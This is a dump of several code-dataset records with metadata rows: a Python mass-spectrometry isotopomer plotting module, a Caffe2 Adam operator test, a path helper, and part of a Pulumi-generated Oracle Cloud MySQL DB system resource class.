                sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
                sample_abbreviations.extend(sample_abbreviations_tmp);
                sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
        for sna_cnt,sna in enumerate(sample_abbreviations):
            print('Plotting precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
            # get the scan_types (optionally intersected with scan_types_I)
            if scan_types_I:
                scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
                scan_types = [st for st in scan_types_tmp if st in scan_types_I];
            else:
                scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
            for scan_type in scan_types:
                print('Plotting precursor and product spectrum for scan type ' + scan_type)
                # met_ids
                if not met_ids_I:
                    met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
                        experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
                else:
                    met_ids = met_ids_I;
                if not(met_ids): continue #no component information was found
                for met in met_ids:
                    print('Plotting precursor and product spectrum for metabolite ' + met);
                    # get replicates
                    replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
                        experiment_id_I,sna,tp,scan_type,met);
                    peakSpectrum_normalized_lst = [];
                    # BUGFIX: fragment_formulas_lst was never initialized (NameError below)
                    fragment_formulas_lst = [];
                    for rep in replicate_numbers:
                        print('Plotting precursor and product spectrum for replicate_number ' + str(rep));
                        #get data
                        peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
                            experiment_id_I,sna,tp,scan_type,met,rep);
                        # guard empty replicates (consistent with plot_normalizedSpectrum)
                        if peakData_I:
                            fragment_formulas = list(peakData_I.keys());
                            fragment_formulas_lst.extend(fragment_formulas);
                            # sum-normalize the peak list for this replicate
                            peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normSum(\
                                peakData_I, fragment_formulas, True);
                            peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
                    # plot spectrum data for all replicates and fragments
                    fragment_formulas_unique = list(set(fragment_formulas_lst));
                    for fragment in fragment_formulas_unique:
                        panelLabels = [];
                        xticklabels = [];
                        mean = [];
                        xlabel = 'm/z'
                        ylabel = 'intensity'
                        for rep,spectrum in enumerate(peakSpectrum_normalized_lst):
                            panelLabels_tmp = sna+'_'+met+'_'+fragment+'_'+str(rep+1)
                            xticklabels_tmp = [];
                            mean_tmp = [];
                            # a replicate may not contain every fragment
                            # (guard added for consistency with plot_normalizedSpectrum)
                            if fragment not in spectrum:
                                print('no spectrum found for fragment ' + fragment);
                                continue;
                            for mass,intensity in spectrum[fragment].items():
                                intensity_tmp = intensity;
                                # plot missing intensities as 0.0
                                if not intensity_tmp: intensity_tmp=0.0
                                mean_tmp.append(intensity_tmp);
                                xticklabels_tmp.append(mass);
                            panelLabels.append(panelLabels_tmp);
                            xticklabels.append(xticklabels_tmp);
                            mean.append(mean_tmp);
                        plot.multiPanelBarPlot('',xticklabels,xlabel,ylabel,panelLabels,mean);
def plot_averageSpectrumNormSum(self,experiment_id_I, time_points_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
    '''plot the average sum-normalized spectrum for all samples and scan types'''
    '''Assumptions:
    only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
    (i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
    '''
    # Plots one bar chart per time-point/sample/scan-type/metabolite/fragment,
    # with error bars derived from the stored CV (%).
    print('plot_averagesNormSum...')
    plot = matplot();
    # get time points
    if time_points_I:
        time_points = time_points_I;
    else:
        time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01AveragesNormSum(experiment_id_I);
    for tp in time_points:
        print('Plotting product and precursor for time-point ' + str(tp));
        # get sample names and sample name abbreviations
        if sample_name_abbreviations_I:
            sample_abbreviations = sample_name_abbreviations_I;
            sample_types_lst = ['Unknown' for x in sample_abbreviations];
        else:
            sample_abbreviations = [];
            sample_types = ['Unknown'];
            sample_types_lst = [];
            for st in sample_types:
                sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(experiment_id_I,st,tp);
                sample_abbreviations.extend(sample_abbreviations_tmp);
                sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
        for sna_cnt,sna in enumerate(sample_abbreviations):
            print('Plotting product and precursor for sample name abbreviation ' + sna);
            # get the scan_types (optionally intersected with scan_types_I)
            if scan_types_I:
                scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
                scan_types = [st for st in scan_types_tmp if st in scan_types_I];
            else:
                scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
            for scan_type in scan_types:
                print('Plotting product and precursor for scan type ' + scan_type)
                # met_ids
                if not met_ids_I:
                    met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum( \
                        experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
                else:
                    met_ids = met_ids_I;
                if not(met_ids): continue #no component information was found
                for met in met_ids:
                    print('Plotting product and precursor for metabolite ' + met);
                    # fragments
                    fragment_formulas = self.stage01_isotopomer_query.get_fragmentFormula_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum( \
                        experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met);
                    for frag in fragment_formulas:
                        print('Plotting product and precursor for fragment ' + frag);
                        # data: mean intensities, CVs (%), and masses for the fragment
                        data_mat,data_mat_cv,data_masses = self.stage01_isotopomer_query.get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum( \
                            experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met,frag);
                        # convert CV (%) back to a standard deviation per mass
                        # (removed unused 'stderr' local)
                        data_stdev = [];
                        for i,d in enumerate(data_mat):
                            stdev = 0.0;
                            if data_mat_cv[i]:
                                stdev = data_mat[i]*data_mat_cv[i]/100;
                            data_stdev.append(stdev);
                        title = sna+'_'+met+'_'+frag;
                        # NOTE(review): axis labels are passed as ('intensity','m/z') here,
                        # the reverse of the sibling plots — confirm barPlot's signature.
                        plot.barPlot(title,data_masses,'intensity','m/z',data_mat,var_I=None,se_I=data_stdev,add_labels_I=True)
# data_stage01_isotopomer deletes
def execute_deleteExperimentFromMQResultsTable(self, experiment_id_I, sample_types_I=('Quality Control', 'Unknown')):
    """Delete rows in data_stage01_MQResultsTable by sample name and sample type
    (default = Quality Control and Unknown) from the experiment.

    Collects every sample_name belonging to the experiment for each sample
    type in sample_types_I, then issues a single delete call for all of them.

    :param experiment_id_I: experiment identifier whose rows are purged
    :param sample_types_I: iterable of sample types to delete
        (tuple default instead of a mutable list default)
    """
    print('deleting rows in data_stage01_MQResultsTable by sample_name and sample_type...')
    # gather all sample_names for the requested sample types
    sample_names = []
    for st in sample_types_I:
        sample_names_tmp = self.stage01_isotopomer_query.get_allSampleNames_experimentIDAndSampleType(experiment_id_I, st)
        sample_names.extend(sample_names_tmp)
    # format into a dictionary list expected by the delete query
    dataDeletes = []
    for sn in sample_names:
        print('deleting sample_name ' + sn)
        dataDeletes.append({'sample_name': sn})
    # delete rows based on sample_names
    self.stage01_isotopomer_query.delete_row_sampleName(dataDeletes)
| 65.708161
| 375
| 0.569678
| 19,144
| 206,915
| 5.865023
| 0.044818
| 0.037246
| 0.022577
| 0.034271
| 0.832339
| 0.805362
| 0.772301
| 0.747497
| 0.731893
| 0.714241
| 0
| 0.012871
| 0.351888
| 206,915
| 3,148
| 376
| 65.729034
| 0.82439
| 0.149491
| 0
| 0.716251
| 0
| 0
| 0.050857
| 0.005691
| 0.00086
| 0
| 0
| 0.000318
| 0
| 1
| 0.018057
| false
| 0
| 0.003439
| 0
| 0.030095
| 0.043422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b863a6c45da3cc66b9aafd17380a1b9266d1ca47
| 91
|
py
|
Python
|
pybullet-gym-rocus/pybulletgym_rocus/envs/assets/robots/franka_panda/__init__.py
|
nbfigueroa/RoCUS
|
f1e1a538a2d0d12d307d9a003c4a2d5bcadcb30f
|
[
"MIT"
] | 7
|
2020-11-20T20:45:49.000Z
|
2021-12-14T19:27:20.000Z
|
urdf/franka_panda/__init__.py
|
michaelyeah7/roblax
|
7f1503986fd50c8336b8b9e7bb1d2f4be4e84b08
|
[
"MIT"
] | 1
|
2021-03-03T03:57:21.000Z
|
2021-03-03T03:57:21.000Z
|
urdf/franka_panda/__init__.py
|
michaelyeah7/roblax
|
7f1503986fd50c8336b8b9e7bb1d2f4be4e84b08
|
[
"MIT"
] | 4
|
2020-11-20T17:00:27.000Z
|
2021-04-01T00:53:50.000Z
|
import os
def get_data_path() -> str:
    """Return the directory containing this module (where the robot asset files live)."""
    # os.path.join with a single argument returns it unchanged; dirname alone suffices.
    return os.path.dirname(__file__)
| 15.166667
| 50
| 0.703297
| 15
| 91
| 3.866667
| 0.733333
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 91
| 5
| 51
| 18.2
| 0.753247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
b876121bec0578b39db4f9db2727d297283b3a8a
| 3,294
|
py
|
Python
|
venv/Lib/site-packages/caffe2/python/ideep/adam_op_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | 1
|
2022-01-08T12:30:44.000Z
|
2022-01-08T12:30:44.000Z
|
venv/Lib/site-packages/caffe2/python/ideep/adam_op_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/caffe2/python/ideep/adam_op_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | null | null | null |
import numpy as np
import hypothesis.strategies as st
import unittest
import caffe2.python.hypothesis_test_util as hu
from caffe2.python import core, workspace
from hypothesis import given
import caffe2.python.ideep_test_util as mu
@unittest.skipIf(not workspace.C.use_mkldnn, "No MKLDNN support.")
class TestAdamOps(hu.HypothesisTestCase):
    """Device-consistency tests for the Caffe2 "Adam" operator under MKL-DNN.

    Each test builds an "Adam" operator over hypothesis-generated tensors and
    hyper-parameters, then asserts that all devices in ``dc`` produce the same
    output parameter (output 0) within a 0.001 threshold.  The two public
    tests differ only in whether "output_grad" is requested, so the shared
    driver below takes the output list as a parameter.
    """

    def _check_adam(self, inputs, ITER, LR, beta1, beta2, epsilon, dc, outputs):
        # Shared driver: build the operator with the requested outputs and
        # run the cross-device check on output 0 (the updated parameter).
        param, mom1, mom2, grad = inputs
        ITER = np.array([ITER], dtype=np.int64)
        LR = np.array([LR], dtype=np.float32)
        # mom2 is a second-moment estimate and must be non-negative.
        mom2 = np.absolute(mom2)
        op = core.CreateOperator(
            "Adam",
            ["param", "mom1", "mom2", "grad", "lr", "iter"],
            outputs,
            beta1=beta1, beta2=beta2, epsilon=epsilon)
        # Iter lives on the CPU
        input_device_options = {'iter': hu.cpu_do, 'lr': hu.cpu_do}
        self.assertDeviceChecks(
            dc, op,
            [param, mom1, mom2, grad, LR, ITER],
            [0],
            input_device_options=input_device_options,
            threshold=0.001)

    @given(inputs=hu.tensors(n=4),
           ITER=st.integers(min_value=0, max_value=10000),
           LR=st.floats(min_value=0.01, max_value=0.99,
                        allow_nan=False, allow_infinity=False),
           beta1=st.floats(min_value=0.01, max_value=0.99,
                           allow_nan=False, allow_infinity=False),
           beta2=st.floats(min_value=0.01, max_value=0.99,
                           allow_nan=False, allow_infinity=False),
           epsilon=st.floats(min_value=0.01, max_value=0.99,
                             allow_nan=False, allow_infinity=False),
           **mu.gcs)
    def test_adam(self, inputs, ITER, LR, beta1, beta2, epsilon, gc, dc):
        # Standard three-output Adam.
        self._check_adam(inputs, ITER, LR, beta1, beta2, epsilon, dc,
                         ["output_param", "output_mom1", "output_mom2"])

    @given(inputs=hu.tensors(n=4),
           ITER=st.integers(min_value=0, max_value=10000),
           LR=st.floats(min_value=0.01, max_value=0.99,
                        allow_nan=False, allow_infinity=False),
           beta1=st.floats(min_value=0.01, max_value=0.99,
                           allow_nan=False, allow_infinity=False),
           beta2=st.floats(min_value=0.01, max_value=0.99,
                           allow_nan=False, allow_infinity=False),
           epsilon=st.floats(min_value=0.01, max_value=0.99,
                             allow_nan=False, allow_infinity=False),
           **mu.gcs)
    def test_adam_output_grad(self, inputs, ITER, LR, beta1, beta2, epsilon, gc, dc):
        # Adam variant that additionally emits the (effective) gradient output.
        self._check_adam(inputs, ITER, LR, beta1, beta2, epsilon, dc,
                         ["output_param", "output_mom1", "output_mom2", "output_grad"])
# Allow running this test module directly as a script.
if __name__ == "__main__":
    unittest.main()
| 39.686747
| 86
| 0.566181
| 416
| 3,294
| 4.300481
| 0.199519
| 0.060369
| 0.050307
| 0.071548
| 0.819452
| 0.819452
| 0.819452
| 0.819452
| 0.819452
| 0.819452
| 0
| 0.052308
| 0.30935
| 3,294
| 82
| 87
| 40.170732
| 0.734066
| 0.013054
| 0
| 0.776119
| 0
| 0
| 0.054097
| 0
| 0
| 0
| 0
| 0
| 0.029851
| 1
| 0.029851
| false
| 0
| 0.104478
| 0
| 0.149254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b88cf46affe5991b9faf2182211229897bc0e825
| 87,210
|
py
|
Python
|
sdk/python/pulumi_oci/mysql/mysql_db_system.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/mysql/mysql_db_system.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/mysql/mysql_db_system.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MysqlDbSystemArgs', 'MysqlDbSystem']
@pulumi.input_type
class MysqlDbSystemArgs:
    # NOTE(review): this class comes from a tfgen-generated file; the only
    # hand-fix applied is merging the duplicated `if mysql_version is not None:`
    # guard in __init__ (the deprecation warning and the set shared the same
    # condition, tested twice). Everything else is unchanged generated code.
    def __init__(__self__, *,
                 admin_password: pulumi.Input[str],
                 admin_username: pulumi.Input[str],
                 availability_domain: pulumi.Input[str],
                 compartment_id: pulumi.Input[str],
                 shape_name: pulumi.Input[str],
                 subnet_id: pulumi.Input[str],
                 backup_policy: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']] = None,
                 configuration_id: Optional[pulumi.Input[str]] = None,
                 data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 fault_domain: Optional[pulumi.Input[str]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 hostname_label: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 is_highly_available: Optional[pulumi.Input[bool]] = None,
                 maintenance: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']] = None,
                 mysql_version: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 port_x: Optional[pulumi.Input[int]] = None,
                 shutdown_type: Optional[pulumi.Input[str]] = None,
                 source: Optional[pulumi.Input['MysqlDbSystemSourceArgs']] = None,
                 state: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a MysqlDbSystem resource.
        :param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
        :param pulumi.Input[str] admin_username: The username for the administrative user.
        :param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        :param pulumi.Input[str] compartment_id: The OCID of the compartment.
        :param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
               * CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
        :param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
        :param pulumi.Input['MysqlDbSystemBackupPolicyArgs'] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
        :param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
        :param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
        :param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
        :param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
        :param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
        :param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
        :param pulumi.Input['MysqlDbSystemMaintenanceArgs'] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
        :param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
        :param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
        :param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
        :param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
        :param pulumi.Input['MysqlDbSystemSourceArgs'] source: Parameters detailing how to provision the initial data of the system.
        :param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
        """
        pulumi.set(__self__, "admin_password", admin_password)
        pulumi.set(__self__, "admin_username", admin_username)
        pulumi.set(__self__, "availability_domain", availability_domain)
        pulumi.set(__self__, "compartment_id", compartment_id)
        pulumi.set(__self__, "shape_name", shape_name)
        pulumi.set(__self__, "subnet_id", subnet_id)
        if backup_policy is not None:
            pulumi.set(__self__, "backup_policy", backup_policy)
        if configuration_id is not None:
            pulumi.set(__self__, "configuration_id", configuration_id)
        if data_storage_size_in_gb is not None:
            pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
        if defined_tags is not None:
            pulumi.set(__self__, "defined_tags", defined_tags)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if fault_domain is not None:
            pulumi.set(__self__, "fault_domain", fault_domain)
        if freeform_tags is not None:
            pulumi.set(__self__, "freeform_tags", freeform_tags)
        if hostname_label is not None:
            pulumi.set(__self__, "hostname_label", hostname_label)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if is_highly_available is not None:
            pulumi.set(__self__, "is_highly_available", is_highly_available)
        if maintenance is not None:
            pulumi.set(__self__, "maintenance", maintenance)
        if mysql_version is not None:
            # Merged duplicate guard: warn about the deprecated field and set it
            # under a single `is not None` check.
            warnings.warn("""The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""", DeprecationWarning)
            pulumi.log.warn("""mysql_version is deprecated: The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""")
            pulumi.set(__self__, "mysql_version", mysql_version)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if port_x is not None:
            pulumi.set(__self__, "port_x", port_x)
        if shutdown_type is not None:
            pulumi.set(__self__, "shutdown_type", shutdown_type)
        if source is not None:
            pulumi.set(__self__, "source", source)
        if state is not None:
            pulumi.set(__self__, "state", state)

    @property
    @pulumi.getter(name="adminPassword")
    def admin_password(self) -> pulumi.Input[str]:
        """
        The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
        """
        return pulumi.get(self, "admin_password")

    @admin_password.setter
    def admin_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "admin_password", value)

    @property
    @pulumi.getter(name="adminUsername")
    def admin_username(self) -> pulumi.Input[str]:
        """
        The username for the administrative user.
        """
        return pulumi.get(self, "admin_username")

    @admin_username.setter
    def admin_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "admin_username", value)

    @property
    @pulumi.getter(name="availabilityDomain")
    def availability_domain(self) -> pulumi.Input[str]:
        """
        The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        """
        return pulumi.get(self, "availability_domain")

    @availability_domain.setter
    def availability_domain(self, value: pulumi.Input[str]):
        pulumi.set(self, "availability_domain", value)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> pulumi.Input[str]:
        """
        The OCID of the compartment.
        """
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "compartment_id", value)

    @property
    @pulumi.getter(name="shapeName")
    def shape_name(self) -> pulumi.Input[str]:
        """
        The name of the shape. The shape determines the resources allocated
        * CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
        """
        return pulumi.get(self, "shape_name")

    @shape_name.setter
    def shape_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "shape_name", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> pulumi.Input[str]:
        """
        The OCID of the subnet the DB System is associated with.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="backupPolicy")
    def backup_policy(self) -> Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]:
        """
        (Updatable) Backup policy as optionally used for DB System Creation.
        """
        return pulumi.get(self, "backup_policy")

    @backup_policy.setter
    def backup_policy(self, value: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]):
        pulumi.set(self, "backup_policy", value)

    @property
    @pulumi.getter(name="configurationId")
    def configuration_id(self) -> Optional[pulumi.Input[str]]:
        """
        The OCID of the Configuration to be used for this DB System.
        """
        return pulumi.get(self, "configuration_id")

    @configuration_id.setter
    def configuration_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "configuration_id", value)

    @property
    @pulumi.getter(name="dataStorageSizeInGb")
    def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
        """
        Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
        """
        return pulumi.get(self, "data_storage_size_in_gb")

    @data_storage_size_in_gb.setter
    def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "data_storage_size_in_gb", value)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) User-provided data about the DB System.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The user-friendly name for the DB System. It does not have to be unique.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="faultDomain")
    def fault_domain(self) -> Optional[pulumi.Input[str]]:
        """
        The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        """
        return pulumi.get(self, "fault_domain")

    @fault_domain.setter
    def fault_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fault_domain", value)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", value)

    @property
    @pulumi.getter(name="hostnameLabel")
    def hostname_label(self) -> Optional[pulumi.Input[str]]:
        """
        The hostname for the primary endpoint of the DB System. Used for DNS.
        """
        return pulumi.get(self, "hostname_label")

    @hostname_label.setter
    def hostname_label(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hostname_label", value)

    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
        """
        return pulumi.get(self, "ip_address")

    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)

    @property
    @pulumi.getter(name="isHighlyAvailable")
    def is_highly_available(self) -> Optional[pulumi.Input[bool]]:
        """
        (Updatable) Specifies if the DB System is highly available.
        """
        return pulumi.get(self, "is_highly_available")

    @is_highly_available.setter
    def is_highly_available(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_highly_available", value)

    @property
    @pulumi.getter
    def maintenance(self) -> Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]:
        """
        (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
        """
        return pulumi.get(self, "maintenance")

    @maintenance.setter
